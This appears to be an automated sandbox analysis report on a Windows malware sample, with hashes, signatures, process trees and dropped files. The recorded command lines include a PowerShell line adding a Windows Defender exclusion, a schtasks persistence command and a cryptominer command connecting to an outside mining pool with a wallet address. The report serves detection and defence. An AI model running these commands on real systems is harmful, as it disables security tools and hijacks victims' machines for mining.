Analysis
-
max time kernel
297s -
max time network
300s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
28/10/2022, 08:18
Static task
static1
Behavioral task
behavioral1
Sample
ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe
Resource
win10v2004-20220901-en
General
-
Target
ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe
-
Size
838KB
-
MD5
c96d5487277ca5bf6f24520f8e391822
-
SHA1
4280f1ada0111c007639df85803374f83467c3ff
-
SHA256
ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7
-
SHA512
42808a2aeda9be51f00403a20c665689fc288310e0aed0530bdce6e13c595670b16a6c3c461b146f2fa9f7033940741151bc0bef793f96a03541c259d230a4e5
-
SSDEEP
6144:uX/cDU0fVh+/5bcBg7Z5ZItm8tn0rGM6rgGQm3da3NQRuvJaA/fUBPXnXGcbjJ1Y:vUX156m88GG0dqawahPHPQQq
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 784 MIDNAUHE.exe 1524 Build.exe 1284 MIDNAUHE.exe -
Loads dropped DLL 1 IoCs
pid Process 1780 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\jetix = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\asbq23.exe" Build.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 784 set thread context of 1968 784 MIDNAUHE.exe 40 PID 1284 set thread context of 188 1284 MIDNAUHE.exe 51 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1544 schtasks.exe 836 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2008 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 960 powershell.exe 932 powershell.exe 784 MIDNAUHE.exe 1284 MIDNAUHE.exe 772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1048 ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 784 MIDNAUHE.exe Token: SeDebugPrivilege 932 powershell.exe Token: SeDebugPrivilege 1284 MIDNAUHE.exe Token: SeDebugPrivilege 772 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1048 wrote to memory of 960 1048 ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe 27 PID 1048 wrote to memory of 960 1048 ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe 27 PID 1048 wrote to memory of 960 1048 ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe 27 PID 1048 wrote to memory of 1780 1048 ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe 29 PID 1048 wrote to memory of 1780 1048 ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe 29 PID 1048 wrote to memory of 1780 1048 ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe 29 PID 1780 wrote to memory of 2008 1780 cmd.exe 31 PID 1780 wrote to memory of 2008 1780 cmd.exe 31 PID 1780 wrote to memory of 2008 1780 cmd.exe 31 PID 1780 wrote to memory of 784 1780 cmd.exe 32 PID 1780 wrote to memory of 784 1780 cmd.exe 32 PID 1780 wrote to memory of 784 1780 cmd.exe 32 PID 784 wrote to memory of 932 784 MIDNAUHE.exe 33 PID 784 wrote to memory of 932 784 MIDNAUHE.exe 33 PID 784 wrote to memory of 932 784 MIDNAUHE.exe 33 PID 784 wrote to memory of 316 784 MIDNAUHE.exe 35 PID 784 wrote to memory of 316 784 MIDNAUHE.exe 35 PID 784 wrote to memory of 316 784 MIDNAUHE.exe 35 PID 316 wrote to memory of 1544 316 cmd.exe 37 PID 316 wrote to memory of 1544 316 cmd.exe 37 PID 316 wrote to memory of 1544 316 cmd.exe 37 PID 784 wrote to memory of 1524 784 MIDNAUHE.exe 38 PID 784 wrote to memory of 1524 784 MIDNAUHE.exe 38 PID 784 wrote to memory of 1524 784 MIDNAUHE.exe 38 PID 784 wrote to memory of 1524 784 MIDNAUHE.exe 38 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 784 wrote to memory of 1968 784 MIDNAUHE.exe 40 PID 1968 wrote to memory of 764 1968 vbc.exe 41 PID 1968 wrote to memory of 764 1968 vbc.exe 41 PID 1968 wrote to memory of 764 1968 vbc.exe 41 PID 548 wrote to memory of 1284 548 taskeng.exe 44 PID 548 wrote to memory of 1284 548 taskeng.exe 44 PID 548 wrote to memory of 1284 548 taskeng.exe 44 PID 1284 wrote to memory of 772 1284 MIDNAUHE.exe 45 PID 1284 wrote to memory of 772 1284 MIDNAUHE.exe 45 PID 1284 wrote to memory of 772 1284 MIDNAUHE.exe 45 PID 1284 wrote to memory of 1364 1284 MIDNAUHE.exe 47 PID 1284 wrote to memory of 1364 1284 MIDNAUHE.exe 47 PID 1284 wrote to memory of 1364 1284 MIDNAUHE.exe 47 PID 1364 wrote to memory of 836 1364 cmd.exe 49 PID 1364 wrote to memory of 836 1364 cmd.exe 49 PID 1364 wrote to memory of 836 1364 cmd.exe 49 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51 PID 1284 wrote to memory of 188 1284 MIDNAUHE.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe"C:\Users\Admin\AppData\Local\Temp\ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpFFD3.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2008
-
-
C:\ProgramData\Microsoft\MIDNAUHE.exe"C:\ProgramData\Microsoft\MIDNAUHE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MIDNAUHE" /tr "C:\ProgramData\Microsoft\MIDNAUHE.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MIDNAUHE" /tr "C:\ProgramData\Microsoft\MIDNAUHE.exe"5⤵
- Creates scheduled task(s)
PID:1544
-
-
-
C:\Users\Admin\AppData\Roaming\Build.exe"C:\Users\Admin\AppData\Roaming\Build.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1524
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RXXAfcF8wVHd7TL79LzjJH6D2FNERzHLkp.work -p x -t 54⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:764
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {378A4B98-51EA-4C0D-AD89-0408F66B5FC3} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\ProgramData\Microsoft\MIDNAUHE.exeC:\ProgramData\Microsoft\MIDNAUHE.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MIDNAUHE" /tr "C:\ProgramData\Microsoft\MIDNAUHE.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MIDNAUHE" /tr "C:\ProgramData\Microsoft\MIDNAUHE.exe"4⤵
- Creates scheduled task(s)
PID:836
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RXXAfcF8wVHd7TL79LzjJH6D2FNERzHLkp.work -p x -t 53⤵PID:188
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:872
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
838KB
MD5c96d5487277ca5bf6f24520f8e391822
SHA14280f1ada0111c007639df85803374f83467c3ff
SHA256ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7
SHA51242808a2aeda9be51f00403a20c665689fc288310e0aed0530bdce6e13c595670b16a6c3c461b146f2fa9f7033940741151bc0bef793f96a03541c259d230a4e5
-
Filesize
838KB
MD5c96d5487277ca5bf6f24520f8e391822
SHA14280f1ada0111c007639df85803374f83467c3ff
SHA256ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7
SHA51242808a2aeda9be51f00403a20c665689fc288310e0aed0530bdce6e13c595670b16a6c3c461b146f2fa9f7033940741151bc0bef793f96a03541c259d230a4e5
-
Filesize
838KB
MD5c96d5487277ca5bf6f24520f8e391822
SHA14280f1ada0111c007639df85803374f83467c3ff
SHA256ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7
SHA51242808a2aeda9be51f00403a20c665689fc288310e0aed0530bdce6e13c595670b16a6c3c461b146f2fa9f7033940741151bc0bef793f96a03541c259d230a4e5
-
Filesize
654KB
MD5a5b3b8fa07fdff608c76d4d2463e1793
SHA18ac85a5afecace98377a2e33ab8c046e01ed74db
SHA256a4748fb90784b7606071bd242fe97a86b091e049018bb162c4c7b0fd591f5492
SHA512b96654f1df3ffec423b4bb699544958d0dd1bd2a30e70e04bf1f0bb7bbf1dd5e25dd0cee9d65ea35f0cffdb77a489ba5356f9156e2a77328fa7e8480d6ef0302
-
Filesize
146B
MD5433083bc88ec57864a42853c1b3fc8b6
SHA16bec5669a7bb79cc83f0b819de14c95310d55331
SHA256f9d481bbe93fedfd68a9b525a13e0d19a45ed847ae6a415d4494aa4a708295bc
SHA5123ab24f91bb5999eef1bef4b76c181c5285574135ae1642a0fbe5aa12721e69c4ff9b3cdd9e4005b60fbbe0ca29c2b1e395f8fbc81997d2cc787a109cd9188a43
-
Filesize
8KB
MD5958318b163eea97096e345be7c53c517
SHA17a372db317f231d915865ee39cf32179e62e6ae3
SHA256e65663ea318c6ff19b2610d29a5b2bfd706fa82dd48a432be7717b9de91d61e5
SHA51262abf4c2fd736f5b8b35e2e446db8267213caf7217d3b18b492a92d446f0e345cf8c1797da3cb9ec4438715c76c72de0402437fbc10ac9f1fee83eb639fecc0a
-
Filesize
8KB
MD5958318b163eea97096e345be7c53c517
SHA17a372db317f231d915865ee39cf32179e62e6ae3
SHA256e65663ea318c6ff19b2610d29a5b2bfd706fa82dd48a432be7717b9de91d61e5
SHA51262abf4c2fd736f5b8b35e2e446db8267213caf7217d3b18b492a92d446f0e345cf8c1797da3cb9ec4438715c76c72de0402437fbc10ac9f1fee83eb639fecc0a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ae509c8a3f030934fe991ffeb380b1eb
SHA1fe8892688ba9486891d1f7c28de4ecef1ac0a38b
SHA256835f12f7bcf904b0bfb019024d1bbd7ead1da8fefbe0d8f68f08c5c50de268c1
SHA512c1c77da33915bf7b85f6ef1cd73a0ef45631ace058edb1fb97918cc644a6ba7dfec0947530a61b9578b5307d2aae2dc88368037edc97f511226c5b8daa1f31f2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ae509c8a3f030934fe991ffeb380b1eb
SHA1fe8892688ba9486891d1f7c28de4ecef1ac0a38b
SHA256835f12f7bcf904b0bfb019024d1bbd7ead1da8fefbe0d8f68f08c5c50de268c1
SHA512c1c77da33915bf7b85f6ef1cd73a0ef45631ace058edb1fb97918cc644a6ba7dfec0947530a61b9578b5307d2aae2dc88368037edc97f511226c5b8daa1f31f2
-
Filesize
838KB
MD5c96d5487277ca5bf6f24520f8e391822
SHA14280f1ada0111c007639df85803374f83467c3ff
SHA256ca43548571c559a85f937635951c1ebd2a26d2ad84a8cc96f669d6b48fd2b9b7
SHA51242808a2aeda9be51f00403a20c665689fc288310e0aed0530bdce6e13c595670b16a6c3c461b146f2fa9f7033940741151bc0bef793f96a03541c259d230a4e5